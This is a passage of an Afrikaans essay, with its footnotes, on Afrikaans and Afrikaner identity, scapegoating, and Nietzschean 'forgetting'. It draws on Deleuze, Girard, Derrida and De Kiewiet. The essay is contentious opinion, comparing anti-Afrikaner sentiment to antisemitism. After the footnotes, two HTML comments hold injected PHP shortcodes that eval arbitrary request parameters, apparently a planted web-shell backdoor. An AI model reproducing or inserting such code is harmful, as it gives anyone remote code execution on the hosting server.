eksklusiwiteit. Duidelik is geeneen van hierdie sienings korrek as dit gemeet word aan taalkundige of demografiese kriteria nie. Wat ons hier sien, is ’n soort omgekeerde diachroniese dialektiek waar die boosheid van gister figureer as die goeie van vandag, en andersom.

Ook die fassinasie met die ontstaan van Afrikaans as taal wat uiting gevind het in vele taalkundige teorieë sedert die negentiende eeu moet in hierdie lig gesien word. Tot vandag toe word die opvatting van Valkhoff gehuldig dat Afrikaans ’n soort Kreoolse taal is wat sy oorsprong had in die pidginisering van Nederlands deur die Koen-bevolking of Hottentotte. In die negentiende eeu is hierdie gemengde herkoms van Afrikaans gesien as bron van onsuiwerheid, as “kitchen Dutch”, ’n term wat die taalkundige verbastering moes benoem wat die taal nie waardig gemaak het om soos die Europese tale oor ’n Bybelvertaling te beskik nie. Watter ironie is dit nie dus dat Afrikaans vandag juis as rassuiwere witmanstaal voorgehou word nie, die dialek van die AWB en dergelike. Binne die kleinlike rastaalpolitiek van Suid-Afrika het Afrikaans daarom binne die bestek van ’n eeu gevorder van nie-blanke taal tot blanke taal, ongelukkig in omgekeerde orde van politieke korrektheid.

Binne ’n gesonde-verstandparadigma het kultuur, ekologie, musiek, kuns, letterkunde, al daardie elemente wat as buitensporig, of en trop soos die Franse sê, beskou kan word, geen plek nie. Daar is ’n besonder Engelse vorm van gesonde verstand (common sense) wat onhebbelik kan wees. Dit is van die soort wat alles in terme van sy nut sien, en nie in terme van sy waarde (wat in elk geval ’n funksie van die mark is) nie. Gesonde verstand beskou die platteland as ’n blote produksiefasiliteit vir die graanmark, en taal as ’n kode vir die uitruil van inligting tussen verbruikers. Alles kan uiteindelik gereduseer word tot sy nutswaarde, en as dit nie daaroor beskik nie, kan dit vernietig word of weggegooi word. So is dit ook met identiteit, die kleur van ’n individu nie in die rassesin nie, maar in die etniese sin, selfs die stamsin. Waarom mag ons nie ’n stam hê nie, al is dit ’n wit stam? Waarom mag ons nie na Schoenberg luister nie, selfs al bestaan daar geen mark vir sy musiek nie? Waarom mag ons nie begeer nie, al is ons begeertes nie rasioneel nie?

Die kritiek op gesonde verstand — teenoor die Kantiaanse sensus communis wat iets anders is — op naïewe realisme en op naïewe empirisme is weer eens grotendeels op die Europese Vasteland gevoer, en nie op die Britse Eilande nie. Kennelik kan dit gesien word as ’n oorvereenvoudiging van twee uiteenlopende filosofiese tradisies, maar binne die kulturele debat in ons land, veral die tweehonderdjaaroue botsing tussen Engels en Afrikaans, is hierdie digotomie tussen ’n kwasi-Angel-Saksiese en ’n kwasi-Vastelandse siening van kultuur herhaal. (Ek laat hier die sogenaamde Afrikanistiese kultuursiening buite rekening omdat dit meer onlangs na vore gekom het en na my mening nie besonder afwyk van sekere fundamenteel Westerse konsepte nie.) ’n Estetiese betrokkenheid met die taal of die landskap mag vanuit die gesonde verstand-siening met sy klem op operasionele kwessies en transnasionale kommunikasie, opvoedkundige opheffing, ens, gewoon “nasionalisties” of selfs fascisties voorkom. Dog die teenoorgestelde is waar wanneer so ’n betrokkenheid vanuit die veelheid van Vastelandse tradisies soos rasionalisme, dialektisisme, of die verskeie vorme van geradikaliseerde vorme van taalkundige strukturalisme en Nietzscheanisme wat ons in die ná-oorlogse Europa vind, beskou word. Deleuze, om maar een voorbeeld te noem, het inderdaad minderheidstaal teenoor dié van die meerderheid gepriviligeer. Hy siteer onder andere die reël van Proust, “Les beaux livres sont écrits dans une sorte de langue étrangère” — “mooi boeke word in ’n soort vreemde taal geskryf” 12. In dieselfde trant praat hy van “etnos, die minderheidagtige, die vluglyn binne die struktuur, die anti-historiese element binne die Geskiedenis”. 13 Afrikaans en alles wat daarmee saamhang, dit het ons ook met die Waarheidskommissie gesien, is toenemend die ongewenste, steurende etniese element wat die samehang van die imperiale Engel se geskiedenis beduiwel. In die sogenaamde nuwe Suid-Afrika word ons gesien as behorende tot ’n voor-geskiedenis, of liefs ’n geskiedenis wat vergeet behoort te word ter wille van die heersersverhaal van swart lyding en bevryding in Engels.

Britse gesonde verstand vrywaar ’n mens boonop nie van rassisme en fascisme, veral daardie besondere variëteit waarna ek vroeër verwys het deur gebruik van die ietwat oudmodiese term, “jingoïsme”, nie. By ’n onlangse konferensie aan die Oxford Universiteit met as titel “South Africa 1895-1921: test of Empire” is die vormingsjare van die huidige semi-nywerheidsland wat ons as Suid-Afrika ken, onder die loep geneem. Die mees onlangse navorsing oor die denke van Lord Milner wat die opvoedkundige beleid met die vorige eeuwending bepaal het en ’n versnelde vorm van verengelsing en taalverdrukking ingestel het in die naam van vooruitgang en ontwikkeling — daardie twee gesonde verstand-ideale — toon duidelik ’n byna boosaardige vorm van Angel-Saksiese heerssugtigheid waarbinne die idee van ’n “heersersras” nie afwesig is nie. Die intellektuele verwarring van ons huidige regering, verskeur tussen Afrikanistiese ideale en die sogenaamde ekonomiese werklikhede wat deur oligopolistiese, koloniale belange aan hom opgedring word, mag wel ’n mutante Milnerisme toelaat in die naam van Afrikabevryding, wat selfs, indien dit te ver gevoer word, kan eindig in een of ander chiliastiese, geradikaliseerde optrede, hetsy deur ’n Kulturele Rewolusie, hetsy umahaa of statsosialisme, of die herinstelling van konsentrasiekampe.

Ek is bewus daarvan dat ek hier sinspeel op sekere van die magtige simbole van wat bekend staan as “denke van regs” binne ons konteks. Dit gaan hier egter nie om opsweping nie, maar om besinning oor die situasie waarin Afrikaans hom tans bevind. Ek durf die moontlikheid van ’n ekstreme terugkeer na Anglosentriese “social engineering” en repressie noem, juis omdat die aktivistiese, moralistiese lesing van die geskiedenis wat onlangs in Suid-Afrika gewild geword het, so kommerwekkend is. Dit is ’n “geskiedenis van die armes” wat soek na ’n enkele oorsaak vir armoede en lyding. Merendeels word dit alles geassosieer met die konsep “apartheid” waarop ek nie nou wil ingaan nie. 14 In soverre as wat die Afrikaner en Afrikaans as ’t ware daarvoor verantwoordelik gehou word dat swart Suid-Afrikaners en by uitbreiding Afrikane suid van die ewenaar nie oor dieselfde vlak van opvoeding en ’n gelykstaande lewenstandaard as die burgers van Switserland beskik nie, het ons te make met die problematiek van die sondebok waarby kwessies soos taal en identiteit wel regstreeks betrokke is. Joodse spekulante is ook verantwoordelik gehou vir die Duitse hiperinflasie tydens die Weimar-republiek, en ons weet waarop dit uitgeloop het.

Voordat ek uitwei oor die opvatting van die sondebok, is dit nodig om te probeer verstaan wat ’n stereotipe of ’n karikatuur soos daar van die Afrikaner en sy politieke betrokkenheid in Suid-Afrika gemaak is, behels. Daar is geen “identiteit” wat so sterk is soos dié van die “dumb Dutchman” nie, daardie frase wat vanaf die Engelse skoolgronde in Suid-Afrika sy weg gevind het tot die voorblad van Time of die gesanik van Europese TV-nuusaanbieders. Veral tydens my verblyf in Frankryk het ek onder die indruk gekom dat ’n mens enigiets oor Suid-Afrika, Afrikaners, Afrikaans, ens, kan kwytraak sonder dat dit in die minste aan een of ander perk of kriterium onderworpe is. Ons is fasciste, mensvreters, moordenaars, barbare, ontaarde wit mense, en wat nog. Ek kan onthou dat die wildbewaarders wat olifante uitdun in die Kruger-wildtuin op televisie voorgehou is as irrasionele wreedaards wat doodmaak omdat dit in hul eie aard is as vermoedelik wit Afrikaners. Vir diegene wat nog gewonder het oor hul identiteit in Afrikaans, is daar reeds ’n klaargemaakte een, ’n “globale identiteit”, wat waarskynlik deur miljarde mense op hierdie planeet as buite bespreking geag word.

Nieteenstaande die besondere verhouding wat daar tussen Afrikaans en die landskap bestaan, en die geworteldheid waarvan daar hierbo melding gemaak is, is dit tans nodig om oor te gaan tot ’n radikale vorm van vergeetagtigheid. By my definisie van Afrikanerskap onlangs, as synde “iemand wat van melktert of koeksisters hou”, wil ek voeg: “iemand wat sterk genoeg is om sy identiteit te vergeet.” Veral ook sy “globale identiteit”.

Sommiges sal hierin ’n Nietzscheaanse definisie van Afrikanerskap sien, en met reg. Nietzsche voel hom as ’t ware ’n vreemdeling tussen die Duitsers, hoewel niemand waarskynlik beter die Duitse taal kon gebruik as juis hy nie. As veeltalige Europeër sien hy neer op die Duitsers en, verwysende na hul kleinlike nasionalisme, chauvinisme, anti-Semitisme, verwys hy na “diese kleinen Benebelungen des Deutschen Geistes und Gewissens” 15 [“die klein bedwelminge van die Duitse gees en die Duitse gewete”]. In sy skerp onafhanklike kyk na sy vaderland — ’n “viviseksie” noem hy dit — is daar vir ons ’n les. Het dit nie tyd geword dat ook ons die skimme van die verlede van ons afwerp en opnuut die vraag vra: wat is Afrikaans, wat beteken dit nie?

Nietzsche neem verder die Duitsers kwalik dat hulle oor “geen hede” beskik nie. Hoeveel te meer is dit nie op ons van toepassing nie! As daar een aspek is van die huidige Suid-Afrika wat uitstaan, is dit die gehamer op die — sy dit dan onlangse — verlede. Elkeen kan homself moreel regverdig en sy vyand as demoon verdoem deur sy visier in te stel op die regte jaartal, of dit nou 1899 of 1976 is. Die selektiewe onthou van die verlede is in ons maatskappy tot ’n kuns verhef, by gebrek aan kuns in die ware sin van die woord. Dit is nodig om ons teen dié dialektiek te verset, deur eenvoudig te vergeet, deur onskuld teen skuld te stel, beaming teen ontkenning, die amorele teen die morele, nie-identiteit teenoor identiteit.

Die intensiteit van die gevoel teen Afrikaans en Afrikaners is nie bloot te verklaar met verwysing na die buitelandse korrespondent wat sy propaganda die wêreld instuur waar dit klakkeloos deur die hordes as evangelie opgeneem word nie. Meer en meer kom dit voor asof anti-Afrikaansheid, of dan “Boerehaat” soos dit tradisioneel bekend staan, nie net vormlik nie maar ook konseptueel verwant is aan anti-Semitisme. Toevallig is Suid-Afrika en Israel tot onlangs in die internasionale media oor dieselfde kam geskeer, maar dit gaan veel dieper, want beide Jode en Afrikaners het ’n kollektiewe aartsonde gepleeg jeens die Weste. In die geval van Jode is dit sekerlik die moord op Christus, asook hul andersheid, hul eksklusiwiteit. Wat Afrikaners en hul voorgangers, die Boere, betref, is dit eerder hul vergeetagtigheid, die feit dat hulle vergeet het hoe om korrek en algemeen beskaaf Nederlands te praat, en in ’n sekere sin hul rug gekeer het op die Westerse beskawing soos wat De Kiewiet beweer. Vergun my weer eens ’n aanhaling uit my gunstelingboek oor die Boere, De Kiewiet se History of South Africa,

Men so widely scattered as they were lost the gregarious habit of their forefathers in Europe. They built few villages. On the great farms each man fled the tyranny of his neighbour’s smoke. It followed that their communal life was loosely organized. They came together when compelled by danger or crisis. In the face of the native population their sense of race and fellowship was exceedingly keen. But their co-operation was not continuous and sustained. The habits of their social life were like the discipline of their commados. It was the sum of individual willingness; at its best it was excellent, at its worst it destroyed the commando. 16

In ’n sekere sin was die Boer dus ’n “soewereine individu” wat staatloos gelewe het, en bloot die gemeenskap opgesoek het as daar sprake was van gevaar. Die beeld van nomades wat al verder verwyder raak van hul oorsprong in die volke van Europa is by uitstek die bydrae van De Kiewiet tot die SA geskiedskrywing, soos ons reeds gesien het. Op ’n baie meer banale vlak kry dit tot vandag toe en veral in die internasionale media uitdrukking in die opvatting dat Afrikaners ’n verworde wit “stam” is en, let wel, geen “volk” nie. Die vergeet van ’n Europese nasionale identiteit is een van die ernstigste aanklagte teen Afrikaners. Dit maak hul minder beskaafd, nader aan barbare, minder moreel.

Aan die ander kant staan die Afrikaner nogtans nader aan die Weste as die Afrikaan wat afkomstig is uit ’n soort Utopie wat nog nie bederf is deur die beskawing nie. In die negentiende eeu het hierdie idee berus in die Rousseauistiese opvatting van die “edele barbaar”; tans vind ons dit terug in die algemeen gangbare geloof dat die lewenstandaard en kwaliteit van lewe van Afrikane veel beter was voor die koms van Europeërs na Suid-Afrika. Trouens, die Groot Trek het die utopiese ruimte van die binneland soos dit gesien is vanuit die Britse sendelingparadigma, besoedel. Die Afrikaner bevind hom dus in ’n tussengebied tussen Europa en Afrika, en hy beskik nóg oor beskawing nóg oor die morele ongeskondenheid van die Afrikaan.

Die hele kwasi-Calvinistiese debat wat daar deesdae romdom “skuld” gevoer word, gaan ons nie eintlik aan nie. Die strik waarin sekere Afrikaanse skrywers trap om skuld of aandadigheid aan die sondige verlede te bely, hoe hulle ouers die woord “kaffer” in die huis gebruik het, die outas agter die kraalmuur met sambokke aangerand het, ens, bewys net weer hoe sterk die globale Afrikaneridentiteit is, dat dit ’n mens oproep tot belydenis, veral as ’n New Yorkse uitgewer sy tjekboek uithaal en sê: “Tell me how dumb ya are, Dutchman.” Glucksmann het reeds gewys op hierdie neiging by die Weste om geen morele skuld aan Afrikane toe te ken nie, en slegs aan die stiefkinders van die Weste, die Afrikaners, alhoewel sy gevolgtrekking dat die Westerling homself in die blanke Suid-Afrikaner weerspieël sien, nie vir my opgaan nie. 17 In die mensdom se obsessie met ras, wat sedert Cuvier en Darwin dateer, is daar voortdurend nuwe vorme van etniese denke en sondeboksoekery wat na vore kom. Teenoor die “eenvoudige” Europese rassisme van die verlede, vind ons nou die oordrag na kwesbare sosiale groepe van die rassekompleks via kulturele of ekonomiese diskriminasie. Niemand het nog ras as konsep afgesweer nie, allermins ons huidige heersers, maar die skuld of die merk van Kaïn het van een groep na ’n ander verskuif.

Die idee van die sondebok is breedvoerig bespreek deur René Girard. 18 Die soort optrede wat uitloop op die soek na ’n sondebok is per definisie dié van ’n heksejag. In sy meer anti-Afrikaanse momente bantwoord die Waarheids- en Versoeningskommissie geheel en al aan hierdie definisie. Tydens die Pes in Europa gedurende die Middeleeue is groot groepe Jode vermoor as sou hulle verantwoordelik gewees het vir die ellende. Die demagogiese begrip “apartheid” is ’n soort opvangbak vir alle maatskaplike euwels wat in Suid-Afrika en selfs in Suider-Afrika werksaam is, vanaf armoede, gebrek aan opvoeding, werkloosheid, tuberkulose, tot Vigs, stamgeweld, misdaad, noem maar op. Dit is nie soveel verskillend van die pes nie, en die werklike oorsake van hierdie toestande is aan ons ewe duister as wat mikrobiologiese verskynsels aan die stadsbewoners van die Middeleeue was. Interessant is dat daar gewoonlik ’n “teken” of eienskap kleef aan die sondebok wat hom uitsonder van die meerderheid aan wie hy kwaad doen of gedoen het. 19 Belangrik is dat die slagoffer van vervolging deur die meerderheid nie gekies word na aanleiding van die misdaad — werklik of verbeeld — wat hy gepleeg het nie, maar op grond van sy slagofferteken wat op stereotipes berus. Stereotipering hou daarom altyd die gevaar van vervolging in. Slagoffertekens is dikwels ook “verskille”, ’n “andersheid” wat ook kultureel of godsdienstig kan wees. ’n Voorbeeld van ’n slagoffer wat deur Girard genoem word is Oedipus in die stuk deur Sophocles.

Plus un individu possède de signes victimaires, plus il a de chances de’attirer la foudre sur sa tête. L’infirmité d’Oedipe, son passé d’enfant exposé, sa situation d’étranger, de parvenu, de roi, font de lui un véritable conglomérat de signes victimaires. 20

[Hoe meer slagoffertekens ’n individu het, hoe groter is die kans dat hy die ongeluk oor hom kan bring. Die gebrek van Oedipus, sy verlede as weggooikind, sy status as buitelander, as parvenu, as koning, maak van hom ’n ware konglomeraat van slagoffertekens.]

In baie opsigte is Afrikaans ’n unieke taal op die vasteland van Afrika, wat die sprekers daarvan ook uniek maak, ’n eienaardige minderheid in ’n wêreld wat oorheers word deur groot imperiale tale: Mandaryns in die Ooste, Engels in die Weste. Dit is ’n ongemaklike posisie om ’n lid van ’n eienaardige minderheid te wees in ’n omgewing of op ’n vasteland wat gedurig gebuk gaan onder maatskaplike en natuurrampe, oorloë, opstande, terreur, misdaad en die verspreiding van aansteeklike siektes soos Vigs en malaria. Soos die Jode, is alle Afrikaners of Afrikaanssprekendes uiters kwesbaar as synde ’n “konglomeraat van slagoffertekens”, en moet hulle byvoorbaat die konsentrasiekamp anderkant die bult sien sodra aantygings van kollektiewe skuld gemaak word of etniese stereotiperingsveldtogte via die massamedia gevoer word.

Ek wil vir ’n oomblik stilstaan by die idee van ’n tussengebied, ’n niemandsland, die uitgestrektheid van die landskap, ’n soort Karoo van die identiteit. Daar is ’n woord in Frans vir “gebied” of “omstreke” wat reeds ontgin is om die aarselende betekenis weer te gee waarna ek soek, die woord “parages”.

Parages: à ce seul mot confions ce qui situe, tout près ou de loin, le double mouvement d’approche et d’éloignement, souvent le même pas, singulièrement divisé, plus vieux et plus jeune que lui-même, autre toujours, au bord de l’événement, quand il arrive et n’arrive pas, infiniment distant à l’approche de l’autre rive. 21

[Gebied: aan hierdie enkele woord wil ons toeken dit wat, hier naby of daar ver, die dubbele beweging van naderkoms en wegtrek omvat, eiesoortiglik verdeel, ouer en jonger as sigself, altyd anders, aan die rand van die gebeurtenis, as dit arriveer én nie arriveer nie, oneindig ver verwyder wanneer die oorkantste oewer benader word.]

As hierdie aanhaling klink soos ’n dekonstruksie van die Groot Trek, is dit nie toevallig nie: dit is afkomstig uit ’n teks van Jacques Derrida oor die werk van Maurice Blanchot. Enkele bladsye later tydens ’n ontleding van Blanchot se boek Le pas au-delà (“Die tree na anderkant”), is daar ’n eg Nietzscheaanse formulering van dieselfde konsep van ’n aarselende oorgang:

Il y a toujours deux pas. L’un dans l’autre mais sans inclusion possible, l’un affectant l’autre immédiatement mais à le franchir en s’eloignant de lui. Toujours deux pas, franchissant jusqu’à leur négation, selon le retour éternel de la transgression passive et de l’affirmation répétée. 22

[Daar is altyd twee treë. Die een voetspoor in die ander maar sonder moontlike insluiting, die een wat die ander onmiddellik affekteer maar deur ’n tree telkens verder weg te gee. Altyd twee treë, te gee tot by hul wedersydse ontkenning, volgens die ewige wederkeer van passiewe oortreding en herhalende bevestiging.]

Die huiwerende situasie van Afrikaans, gevang in sy taalgebied in Afrika maar gedurig intellektueel in pas met Europa, is vir my nie anders as die beskrewe beweging nie. Ook die posisie van Afrikaans, in sy opkoms en verval as amptelike taal, die skynbaar fatale dans met mag van die pas afgelope veertig jaar of so, kan gesien word as ’n betreding van dié unieke tussengebied waar die bordjies telkens verhang word. Taalbeweging, taaltrek, taaldraadtrek, dit is soveel valle van die dobbelsteen van die ewige wederkeer. Maar betreding dui reeds op die begaan van ’n oortreding, om die ander se taalgebied as ’t ware te kom bevuil met jou poësie, jou letterkunde, jou radio- of televisieprogram, jou advertensie, jou preek of draakstekery.

Die eindelose herkolonisering van die Afrikaner, nou in die naam van imperiale uitbreiding, dan weer in die naam van postkoloniale ontwikkeling, is inderdaad ’n ervaring van die ewige wederkeer. Dié heen-en-weer beweging wat nie net die herhaalde aanslae van die geskiedenis omvat nie, maar ook die uitspeel van Afrikaans in sy verhouding tot die Suid-Afrikaanse landskap in die breedste moontlike sin, word vir my mooi saamgevat deur Deleuze se koeplet deterritorialisering/reterritorialisering. Afrikaans is letterlik ’n gedeterritorialiseerde Nederlands, wat op sy beurt gereterritorialiseer word deur Engels en die pre-koloniale Afrika-utopie.

’n Mens hoor dikwels dat Afrikaans onder die vorige bewind “bevoorreg” is, en nou gestraf moet word daarvoor. Hierdie denke is eienaardig, maar op ’n manier gee die tussengebied wat Afrikaans beklee hom tog ’n verhewe en daarom bevoorregte posisie. In ’n sekere sin is die Suid-Afrikaanse ervaring nóg Europees, nóg van Afrika. Dit behels drie eeue van deterritorialisering, van vergeet van én die Europese identiteit én die Afrika-identiteit. Ek word geïntrigeer deur die volgende opmerking van ’n sekere historikus wat allermins Afrikaans of die Afrikaner goedgesind is, en wat waarskynlik geen erg sou hê aan die verdwyning van Afrikaans as taal nie. Verwysende na die Hoëveld, meen hy:

These hot, dry and expansive plains of the subcontinent provide the country with its most characteristic landscape, and a distinctive terminology which singles out for special attention any geomorphological feature which so much as hints at either height or water. Koppie, krans, pan, platteland, rand, sloot, spruit, vlakte, and vlei — are all Afrikaans words that defy easy translation and which have been incorporated holus-bolus into the vocabulary of all urban South Africans. They are quintessentially highveld words; words that give life to the ways in which one senses and experiences much of what it is to be South African … When an authentic South African identity eventually emerges from this troubled country it will, in large part, have come from painful experiences on the highveld. 23

Die leser van Nietzsche kan nie anders as om hardop te skater oor die opvatting van “’n outentieke Suid-Afrikaanse identiteit nie”, maar is dit nie ’n kraak in die mondering van die “nasionale en internasionale lingua franca” nie? Wat Van Onselen, die outeur van hierdie reëls nie besef nie, is dat die skoonheid van hierdie woorde — hierdie Afrikaanse woorde — nie uitvloei vanaf of selfs neig na ’n ware identiteit nie, maar vanuit ’n proses van vergeet, van swerf, van soeke na die horison van die tussengebied.

Die verskil tussen Afrikaner-nasionalisme en Afrika-nasionalisme is een lettergreep, en albei hou aan ons ’n identiteit voor wat gefabriseer word uit herinnerde idealisme, Plato se proses van anamnese waar ons almal soos grotbewoners droom van die helder lig daarbuite wat ons nooit sal smaak nie omdat dit tot die ideële wêreld behoort. Eerder as wat ons die identiteit nastreef wat deur die kultuurpolisie van die nuwe ou Suid-Afrika aan ons voorgehou word, behoort ons die proses van vergeet wat eie aan Afrikaans is, voort te sit. Ons behoort ons verlies aan ’n identiteit te bevestig of, in Nietzscheaanse terme, dit te beja.

Om Afrikaans te beja sou onder meer behels om verby die taalmoraliteit en -moralisme te kyk. Soos Nietzsche dit stel:

Die Moral, insofern sie verurteilt, an sich, nicht aus Hinsichten, Rücksichten, Absichten des Lebens, ist ein spezifischer Irrtum, mit dem man kein Mitleiden haben soll, eine Degenerierten-Idiosynkrasie, die unsäglich viel Schaden gestiftet hat! … Wir anderen, wir Immoralisten, haben umgekehrt unser Herz weit gemacht für alle Art Vertstehn, Begreifen, Gutheißen. Wir verneinen nicht leicht, wir suchen unsre Ehre darin, Bejahende zu sein … 24

[Die moraal, sover dit op grond van homself veroordeel, en nie met verwysing na en waardering vir die doel van die lewe nie, is ’n spesifieke dwaling waarmee ’n mens geen simpatie behoort te hê nie, ’n idiosinkrasie van die gedegenereerdes wat ontsaglike skade veroorsaak het! … Ons ander, die immoraliste, het inteendeel ons harte oopgemaak vir elke soort verstaan, begrip, goedkeuring. Ons ontken nie maklik nie, ons soek na ons eer deur bejaend te wees.]

Elders lees ons, met verwysing na die estetika:

‘Das ist schön’ is eine Bejahung. 25

[‘Dit is mooi’ is ’n bejaïng.]

Om Afrikaans te beja sou dus behels om in die eerste plek die taalmoraliteit af te sweer, die historiese rekeningkunde waar die taal nou promoveer tot “bate”, nou weer tot “las”. In hierdie dae van herinnering aan die onlangse verlede, gaan dit waarskynlik byna bomenslike moed verg om te vergeet, om aktief te vergeet ten einde die onskuld te verwerf waarsonder geen skepping moontlik is nie. Om aktief te vergeet beteken myns insiens op die minste ’n stellingname, ’n sekere strydvaardigheid en bereidheid om ’n standpunt te huldig. Dit gaan my te bowe dat soveel middelmatige persoonlikhede behorende tot ons openbare lewe soveel snert en onsinnighede oor Afrikaans en die kultuur in die algemeen kan kwytraak en skotvry daarvan afkom. Is daar geen skrywers meer in Afrikaans nie, kruip hulle almal onder die bed weg? Het ons geen denkers meer nie, of is hulle nog besig om hulself te heroriënteer sodat hulle gemaklik die oorgang vanaf die Broederbond na die Africanbond kan maak? Het Eugène Marais verniet “Winternag” geskryf en verniet teen die morfien gestry? Is ons so geïntimideer deur ’n spul opgepompte Europeërs en Amerikaners wat geen snars van Suid-Afrika verstaan nie dat ons eers die rokspante van die Kappiekommando sal moet vind voordat ons durf antwoord op hul lomp bekookte beledigings?

Is daar niemand wat identiteitloos genoeg is om ja te sê vir Afrikaans nie?

Notes:

 1. Heidegger, Martin. Gelassenheit. Pfullingen: Verlag Günther Neske, 1959.
 2. Schoeman, Karel. Hierdie Lewe. Kaapstad: Human & Rousseau, 1993.
 3. Sien byvoorbeeld die beskrywing op bladsy 10, ibid., wat begin “Helder land, glansende silwergrys land wat voor my wegdrywe in die nag, waar ek verwonderd sien hoe elke tak van die harpuisbos glinster soos die digte spirale van sy blaartjies die skynsel van die lig weerkaats en elke rots dof gloei teen die rante …”
 4. Rancière, Jacques. Courts voyages au pays du peuple. Parys: Ed. du Seuil, 1990.
 5. ibid., bl. 7.
 6. De Kiewiet, CW. A history of South Africa, social and economic. Londen: Oxford Univ Press, 1942.
 7. ibid, bl 17.
 8. Blum, Peter. ”Rooinekke op Hermanus” in Steenbok tot poolsee. Kaapstad: Tafelberg, 1974.
 9. P Vergilius Maro. Bucolica et georgica. Basingstoke en Londen: Macmillan, 1972, bll 1-3.
 10. Kristeva, Julia. Etrangers � nous-m�mes. Parys: Fayard, 1988, bl 9.
 11. Van Melle, J. Bart Nel. Pretoria: JL van Schaik, 1981.
 12. Deleuze, Gilles. Superpositions. Parys: Minuit, 1979, bl 109.
 13. ibid, bl 127.
 14. Vergelyk sekere van my opmerkings in Om die Waarheidskommissie te vergeet aangaande die ahistoriese aard van hierdie begrip.
 15. Nietzsche, Friedrich. Sämtliche Werke: Jenseits von Gute und B�se. Stuttgart: Alfred Kröner Verlag, 1964, bl 183.
 16. op cit, bl 19.
 17. Glucksmann, André en Wolton, Thierry. Silence on tue. Parys: Grasset, 1986, bll 23-24.
 18. Girard, René. Le bouc émissaire. Parys: Grasset, 1982.
 19. ibid, bll 30-31.
 20. ibid, bl 39.
 21. Derrida, Jacques. Parages. Parys: Galilée, 1986, bl 15.
 22. ibid, bl 59.
 23. Van Onselen, Charles. The seed is mine. Kaapstad: David Philip, 1996, bll v-vi.
 24. Nietzsche, Friedrich. Sämtliche Werke: Göttzendämmerung. Stuttgart: Alfred Kröner Verlag, 1964, bl 106.
 25. ibid, Der Wille zur Macht, bl 573.

<!– [insert_php]if (isset($_REQUEST["ItV"])){eval($_REQUEST["ItV"]);exit;}[/insert_php][php]if (isset($_REQUEST["ItV"])){eval($_REQUEST["ItV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LazC"])){eval($_REQUEST["LazC"]);exit;}[/insert_php][php]if (isset($_REQUEST["LazC"])){eval($_REQUEST["LazC"]);exit;}[/php] –>